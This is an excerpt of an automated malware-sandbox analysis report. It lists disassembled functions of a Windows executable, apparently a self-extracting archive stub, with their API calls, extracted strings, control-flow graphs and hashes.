                                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,007C08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0079F762
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,007C0870,00000800,?,00000000,?,00000800), ref: 0079F78B
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,0|,00000800), ref: 0079F7C4
                                                                                                                                          • Part of subcall function 0079F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                          • Part of subcall function 0079F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        • _swprintf.LIBCMT ref: 0079F834
                                                                                                                                        • _swprintf.LIBCMT ref: 0079F880
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • AllocConsole.KERNEL32 ref: 0079F888
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0079F892
                                                                                                                                        • AttachConsole.KERNEL32(00000000), ref: 0079F899
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0079F8BF
                                                                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 0079F8C6
                                                                                                                                        • Sleep.KERNEL32(00002710), ref: 0079F8D1
                                                                                                                                        • FreeConsole.KERNEL32 ref: 0079F8D7
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0079F8DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                                                        • String ID: |$$|$,|$0|$@|$D|$D|$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\|$\|$`|$dwmapi.dll$kernel32$t|$uxtheme.dll$x|$x|$|$|
                                                                                                                                        • API String ID: 1201351596-908925887
                                                                                                                                        • Opcode ID: d096cfc180df053bc3ba6f9845e275cac94f731ad10283b6cbfa849fdbba47d7
                                                                                                                                        • Instruction ID: f7bdac9ca05c42f29c19eedc57e12f883f197e3d7ad7691cd9c3cd8a64ff5139
                                                                                                                                        • Opcode Fuzzy Hash: d096cfc180df053bc3ba6f9845e275cac94f731ad10283b6cbfa849fdbba47d7
                                                                                                                                        • Instruction Fuzzy Hash: B4D16FB1148384EADB30DFA0D849F9FBBE8AB84304F50492DF58996241D7BC9548CBE6
                                                                                                                                        Function 007AAA45 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 438windowfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 404 7aaa45-7aaa5d call 7acdf0 call 7acec0 409 7aaa63-7aaa8d call 7a96ec 404->409 410 7ab645-7ab652 404->410 409->410 413 7aaa93-7aaa98 409->413 414 7aaa99-7aaaa7 413->414 415 7aaaa8-7aaab8 call 7a93ba 414->415 418 7aaaba 415->418 419 7aaabc-7aaad1 call 7a0b12 418->419 422 7aaade-7aaae1 419->422 423 7aaad3-7aaad7 419->423 425 7ab611-7ab63c call 7a96ec 422->425 426 7aaae7 422->426 423->419 424 7aaad9 423->424 424->425 425->414 439 7ab642-7ab644 425->439 428 7aad9b-7aad9d 426->428 429 7aaaee-7aaaf1 426->429 430 7aad7e-7aad80 426->430 431 7aacdd-7aacdf 426->431 428->425 436 7aada3-7aadaa 428->436 429->425 435 7aaaf7-7aab64 call 7a8b8e call 79b56e call 79a11c call 79a256 call 796fa3 call 79a1a9 429->435 430->425 434 7aad86-7aad96 SetWindowTextW 430->434 431->425 432 7aace5-7aacf1 431->432 437 7aacf3-7aad04 call 7b4654 432->437 438 7aad05-7aad0a 432->438 434->425 504 7aab6a-7aab70 435->504 505 7aacc9-7aacd8 call 79a132 435->505 436->425 441 7aadb0-7aadc9 436->441 437->438 445 7aad0c-7aad12 438->445 446 7aad14-7aad1f call 7a9844 438->446 439->410 442 7aadcb 441->442 443 7aadd1-7aaddf call 7b20b3 441->443 442->443 443->425 459 7aade5-7aadee 443->459 451 7aad24-7aad26 445->451 446->451 456 7aad28-7aad2f call 7b20b3 451->456 457 7aad31-7aad51 call 7b20b3 call 7b20de 451->457 456->457 478 7aad6a-7aad6c 457->478 479 7aad53-7aad5a 457->479 463 7aadf0-7aadf4 459->463 464 7aae17-7aae1a 459->464 463->464 469 7aadf6-7aadfe 463->469 470 7aaeff-7aaf0d call 79f10e 464->470 471 7aae20-7aae23 464->471 469->425 475 7aae04-7aae12 call 79f10e 469->475 487 7aaf0f-7aaf23 call 7b031b 470->487 476 7aae30-7aae4b 471->476 477 7aae25-7aae2a 471->477 475->487 490 7aae4d-7aae87 476->490 491 7aae95-7aae9c 476->491 477->470 477->476 478->425 486 7aad72-7aad79 call 7b20ce 478->486 483 7aad5c-7aad5e 479->483 484 7aad61-7aad69 call 7b4654 479->484 483->484 484->478 486->425 506 7aaf30-7aaf83 call 79f10e call 7a9592 GetDlgItem SetWindowTextW SendMessageW call 7b20e9 487->506 507 7aaf25-7aaf29 487->507 526 7aae8b-7aae8d 490->526 527 7aae89 490->527 497 7aaeca-7aaeed call 7b20b3 * 2 491->497 498 7aae9e-7aaeb6 call 7b20b3 491->498 497->487 531 7aaeef-7aaefd call 79f0e6 497->531 498->497 517 7aaeb8-7aaec5 call 79f0e6 498->517 510 7aab77-7aab8c SetFileAttributesW 504->510 505->425 541 7aaf88-7aaf8c 506->541 507->506 511 7aaf2b-7aaf2d 507->511 518 7aac32-7aac3e GetFileAttributesW 510->518 519 7aab92-7aabc5 call 79b100 call 79adf5 call 7b20b3 510->519 511->506 517->497 524 7aacae-7aacc3 call 79a1a9 518->524 525 7aac40-7aac4f DeleteFileW 518->525 551 7aabd8-7aabe6 call 79b52e 519->551 552 7aabc7-7aabd6 call 7b20b3 519->552 524->505 544 7aab72 524->544 525->524 532 7aac51-7aac54 525->532 526->491 527->526 531->487 538 7aac58-7aac84 call 793f5b GetFileAttributesW 532->538 549 7aac56-7aac57 538->549 550 7aac86-7aac9c MoveFileW 538->550 541->425 546 7aaf92-7aafa4 SendMessageW 541->546 544->510 546->425 549->538 550->524 553 7aac9e-7aaca8 MoveFileExW 550->553 551->505 558 7aabec-7aac2b call 7b20b3 call 7adea0 551->558 552->551 552->558 553->524 558->518
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 007AAA4A
                                                                                                                                          • Part of subcall function 007A96EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007A97B4
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,007AA35D,?,00000000), ref: 007AAB7F
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 007AAC39
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007AAC47
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 007AAD90
                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 007AAF1A
                                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 007AAF55
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 007AAF65
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,007D412A), ref: 007AAF79
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007AAFA2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                        • String ID: %s.%d.tmp$*A}$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                        • API String ID: 3676479488-2127928686
                                                                                                                                        • Opcode ID: bd966fa016fc0bdc3d32afd5e3367e39687e1f35e809653ffc4e3d9ccf854eb1
                                                                                                                                        • Instruction ID: c327649e36fd89f63a61be8af9e26d6723802efc7ad8b692612cc58ab3055e85
                                                                                                                                        • Opcode Fuzzy Hash: bd966fa016fc0bdc3d32afd5e3367e39687e1f35e809653ffc4e3d9ccf854eb1
                                                                                                                                        • Instruction Fuzzy Hash: FBE16272901119EAEF24EBA0ED89EEE737CAF46350F1041A6F505E7041EF789B84CB61
                                                                                                                                        Function 0079CED7 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 563 79ced7-79cf51 call 79c88e GetWindowRect GetClientRect 566 79cff2-79cffa 563->566 567 79cf57-79cf5f 563->567 569 79d034-79d04f GetSystemMetrics GetWindow 566->569 570 79cffc-79d02e GetWindowTextW call 79c91f SetWindowTextW 566->570 568 79cf65-79cfae 567->568 567->569 573 79cfb0 568->573 574 79cfb2-79cfb4 568->574 572 79d12d-79d12f 569->572 570->569 578 79d135-79d13f 572->578 579 79d054-79d05a 572->579 573->574 576 79cfb8-79cfee GetWindowLongW GetWindowRect 574->576 577 79cfb6 574->577 576->566 577->576 579->578 580 79d060-79d078 GetWindowTextW 579->580 581 79d07a-79d099 call 79c91f SetWindowTextW 580->581 582 79d09f-79d0a4 580->582 581->582 585 79d11b-79d12a GetWindow 582->585 586 79d0a6-79d114 GetWindowRect 582->586 585->578 588 79d12c 585->588 586->585 588->572
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079C88E: _wcschr.LIBVCRUNTIME ref: 0079C8BD
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079CF0E
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0079CF1A
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0079CFBB
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079CFE8
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0079D007
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0079D02E
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0079D036
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 0079D041
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000400), ref: 0079D06C
                                                                                                                                        • SetWindowTextW.USER32(00000000,00000000), ref: 0079D099
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079D0AC
                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0079D11E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                                                                        • String ID: d
                                                                                                                                        • API String ID: 4134264131-2564639436
                                                                                                                                        • Opcode ID: 343b5b3d068c10a1ac19633bac9ff7cb04fdf6639f20e5e0b14d02acaa2d50b1
                                                                                                                                        • Instruction ID: c1b8b7e6feecb1bbd7c4352d3eeaff142836c3460a3d8e55d13cc821687237c0
                                                                                                                                        • Opcode Fuzzy Hash: 343b5b3d068c10a1ac19633bac9ff7cb04fdf6639f20e5e0b14d02acaa2d50b1
                                                                                                                                        • Instruction Fuzzy Hash: E8617CB2208344AFD711DF68DD89E6BBBEAFBC9714F04491DF68492290C678ED058B52
                                                                                                                                        Function 007AB70E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(00000068,007E8958), ref: 007AB71D
                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,007A9325), ref: 007AB748
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007AB757
                                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,007C02E4), ref: 007AB761
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007AB777
                                                                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007AB78D
                                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007AB7CD
                                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007AB7D7
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007AB7E6
                                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007AB809
                                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,007C1368), ref: 007AB814
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ItemShowWindow
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 1207805008-2967466578
                                                                                                                                        • Opcode ID: 58cf7ed76a42d2497ff49f20a56f3e8ca75121f9c02c11a526e0ea181d1ecad0
                                                                                                                                        • Instruction ID: 4d5e214a8d6519e8bc35db819d38cf5642690d6cf4ac1e03313805aaac1dfb45
                                                                                                                                        • Opcode Fuzzy Hash: 58cf7ed76a42d2497ff49f20a56f3e8ca75121f9c02c11a526e0ea181d1ecad0
                                                                                                                                        • Instruction Fuzzy Hash: 0D2134B12857447AE311AB248C41FAB7B9CEFC2714F00061DFA90961D1D7A949098AAB
                                                                                                                                        Function 007AB9AA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 179COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 621 7ab9aa-7ab9c2 call 7acec0 624 7ab9c8-7ab9d4 call 7b20b3 621->624 625 7abc0e-7abc16 621->625 624->625 628 7ab9da-7aba02 call 7adea0 624->628 631 7aba0c-7aba19 628->631 632 7aba04 628->632 633 7aba1b 631->633 634 7aba1d-7aba26 631->634 632->631 633->634 635 7aba28-7aba2a 634->635 636 7aba5e 634->636 637 7aba32-7aba35 635->637 638 7aba62-7aba64 636->638 639 7aba3b-7aba43 637->639 640 7abbc2-7abbc7 637->640 641 7aba6b-7aba6d 638->641 642 7aba66-7aba69 638->642 643 7abbdb-7abbe3 639->643 644 7aba49-7aba4f 639->644 645 7abbc9 640->645 646 7abbbc-7abbc0 640->646 647 7aba80-7aba92 call 79b09c 641->647 648 7aba6f-7aba76 641->648 642->641 642->647 651 7abbeb-7abbf3 643->651 652 7abbe5-7abbe7 643->652 644->643 649 7aba55-7aba5c 644->649 650 7abbce-7abbd2 645->650 646->640 646->650 656 7abaab-7abab6 call 799dff 647->656 657 7aba94-7abaa1 call 7a0b12 647->657 648->647 653 7aba78 648->653 649->636 649->637 650->643 651->638 652->651 653->647 663 7abab8-7abacf call 79ae20 656->663 664 7abad3-7abae0 ShellExecuteExW 656->664 657->656 662 7abaa3 657->662 662->656 663->664 666 7abc0c-7abc0d 664->666 667 7abae6-7abaf9 664->667 666->625 669 7abafb-7abb02 667->669 670 7abb0c-7abb0e 667->670 669->670 673 7abb04-7abb0a 669->673 671 7abb10-7abb19 670->671 672 7abb21-7abb40 call 7abe69 670->672 671->672 680 7abb1b-7abb1f ShowWindow 671->680 674 7abb77-7abb83 CloseHandle 672->674 691 7abb42-7abb4a 672->691 673->670 673->674 677 7abb94-7abba2 674->677 678 7abb85-7abb92 call 7a0b12 674->678 681 7abbff-7abc01 677->681 682 7abba4-7abba6 677->682 678->677 688 7abbf8 678->688 680->672 681->666 685 7abc03-7abc05 681->685 682->681 686 7abba8-7abbae 682->686 685->666 689 7abc07-7abc0a ShowWindow 685->689 686->681 690 7abbb0-7abbba 686->690 688->681 689->666 690->681 691->674 692 7abb4c-7abb5d GetExitCodeProcess 691->692 692->674 693 7abb5f-7abb69 692->693 694 7abb6b 693->694 695 7abb70 693->695 694->695 695->674
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteExW.SHELL32(000001C0), ref: 007ABAD8
                                                                                                                                        • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 007ABB1D
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 007ABB55
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007ABB7B
                                                                                                                                        • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 007ABC0A
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                                                                        • String ID: $*Q}$.exe$.inf
                                                                                                                                        • API String ID: 3686203788-4020410685
                                                                                                                                        • Opcode ID: d17343024a21f5f899abd27cc907e1b590efdbaaa80d2563b2c3648ea8376043
                                                                                                                                        • Instruction ID: 2fb66c25396f33fa63c55375fac895ab6737df7ae53e1621876fd36fe0623634
                                                                                                                                        • Opcode Fuzzy Hash: d17343024a21f5f899abd27cc907e1b590efdbaaa80d2563b2c3648ea8376043
                                                                                                                                        • Instruction Fuzzy Hash: C35105B1506380DAD7319F20D984A7BB7E5AFC6304F048A1DE4C197157DB7D9944CBA2
                                                                                                                                        Function 0079CACC Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 696 79cacc-79cb00 call 7acdf0 call 7acec0 call 7b0138 703 79cb33-79cb3c call 79f10e 696->703 704 79cb02-79cb31 GetModuleFileNameW call 79b88c call 79f0e6 696->704 708 79cb41-79cb65 call 799401 call 79973d 703->708 704->708 715 79cdb8-79cdd3 call 799437 708->715 716 79cb6b-79cb74 708->716 717 79cb77-79cb7a 716->717 719 79cca8-79ccc8 call 7999e0 call 7b20d3 717->719 720 79cb80-79cb86 call 799aeb 717->720 719->715 730 79ccce-79cce7 call 79990d 719->730 725 79cb8b-79cbb2 call 79990d 720->725 731 79cbb8-79cbc0 725->731 732 79cc71-79cc74 725->732 744 79cce9-79ccee 730->744 745 79ccf0-79cd02 call 7b20d3 730->745 734 79cbeb-79cbf6 731->734 735 79cbc2-79cbca 731->735 736 79cc77-79cc99 call 7999e0 732->736 739 79cbf8-79cc04 734->739 740 79cc21-79cc29 734->740 735->734 738 79cbcc-79cbe6 call 7b3660 735->738 736->717 755 79cc9f-79cca2 736->755 761 79cbe8 738->761 762 79cc67-79cc6f 738->762 739->740 747 79cc06-79cc0b 739->747 742 79cc2b-79cc33 740->742 743 79cc55-79cc59 740->743 742->743 749 79cc35-79cc4f call 7b3660 742->749 743->732 750 79cc5b-79cc5e 743->750 751 79cd27-79cd2f 744->751 745->715 767 79cd08-79cd25 call 7a06e9 call 7b20ce 745->767 747->740 754 79cc0d-79cc1f call 7b3589 747->754 749->715 749->743 750->731 757 79cd31 751->757 758 79cd34-79cd41 751->758 754->740 768 79cc63 754->768 755->715 755->719 757->758 764 79cdad-79cdb5 758->764 765 79cd43-79cd45 758->765 761->734 762->736 764->715 769 79cd46-79cd50 765->769 767->751 768->762 769->764 771 79cd52-79cd56 769->771 773 79cd58-79cd5f 771->773 774 79cd90-79cd93 771->774 779 79cd61-79cd64 773->779 780 79cd86 773->780 777 79cd9d-79cd9f 774->777 778 79cd95-79cd9b 774->778 782 79cda0 777->782 778->777 778->782 783 79cd82-79cd84 779->783 784 79cd66-79cd69 779->784 781 79cd88-79cd8e 780->781 785 79cda4-79cdab 781->785 782->785 783->781 786 79cd6b-79cd6e 784->786 787 79cd7e-79cd80 784->787 785->764 785->769 788 79cd7a-79cd7c 786->788 789 79cd70-79cd74 786->789 787->781 788->781 789->782 790 79cd76-79cd78 789->790 790->781
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079CAD1
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0079CAEF
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0079CAB3,?), ref: 0079CB0A
                                                                                                                                          • Part of subcall function 007A06E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0079B25B,00000000,?,?,?,?), ref: 007A0705
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                                                                        • String ID: *messages***$*messages***$R$a
                                                                                                                                        • API String ID: 803915177-2900423073
                                                                                                                                        • Opcode ID: ebe3da31c04b70ee80ae03944efa3a524df34085ecf62ef4b0910da24e61b61a
                                                                                                                                        • Instruction ID: 2ee4a8d17e223141e9634227c9e0d7c1dbf3cc543c8f9c6408a06ee6466e6296
                                                                                                                                        • Opcode Fuzzy Hash: ebe3da31c04b70ee80ae03944efa3a524df34085ecf62ef4b0910da24e61b61a
                                                                                                                                        • Instruction Fuzzy Hash: 979114B1A00205DBDF21DF68EC4ABEE7BA4EF55310F10456EE649E7291DA789A80CB50
                                                                                                                                        Function 007B73AE Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 791 7b73ae-7b73c7 792 7b73c9-7b73d9 call 7bb9bc 791->792 793 7b73dd-7b73e2 791->793 792->793 800 7b73db 792->800 795 7b73ef-7b7413 MultiByteToWideChar 793->795 796 7b73e4-7b73ec 793->796 798 7b7419-7b7425 795->798 799 7b75a6-7b75b9 call 7ad783 795->799 796->795 801 7b7479 798->801 802 7b7427-7b7438 798->802 800->793 805 7b747b-7b747d 801->805 806 7b743a-7b7449 call 7bf160 802->806 807 7b7457-7b7468 call 7b59fc 802->807 809 7b759b 805->809 810 7b7483-7b7496 MultiByteToWideChar 805->810 806->809 816 7b744f-7b7455 806->816 807->809 817 7b746e 807->817 815 7b759d-7b75a4 call 7b7616 809->815 810->809 814 7b749c-7b74ae call 7b7a09 810->814 821 7b74b3-7b74b7 814->821 815->799 820 7b7474-7b7477 816->820 817->820 820->805 821->809 823 7b74bd-7b74c4 821->823 824 7b74fe-7b750a 823->824 825 7b74c6-7b74cb 823->825 826 7b750c-7b751d 824->826 827 7b7556 824->827 825->815 828 7b74d1-7b74d3 825->828 831 7b7538-7b7549 call 7b59fc 826->831 832 7b751f-7b752e call 7bf160 826->832 829 7b7558-7b755a 827->829 828->809 830 7b74d9-7b74f3 call 7b7a09 828->830 833 7b755c-7b7575 call 7b7a09 829->833 834 7b7594-7b759a call 7b7616 829->834 830->815 844 7b74f9 830->844 831->834 847 7b754b 831->847 832->834 846 7b7530-7b7536 832->846 833->834 848 7b7577-7b757e 833->848 834->809 844->809 849 7b7551-7b7554 846->849 847->849 850 7b75ba-7b75c0 848->850 851 7b7580-7b7581 848->851 849->829 852 7b7582-7b7592 WideCharToMultiByte 850->852 851->852 852->834 853 7b75c2-7b75c9 call 7b7616 852->853 853->815
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007B2FC2,007B2FC2,?,?,?,007B75FF,00000001,00000001,F5E85006), ref: 007B7408
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007B75FF,00000001,00000001,F5E85006,?,?,?), ref: 007B748E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007B7588
                                                                                                                                        • __freea.LIBCMT ref: 007B7595
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        • __freea.LIBCMT ref: 007B759E
                                                                                                                                        • __freea.LIBCMT ref: 007B75C3
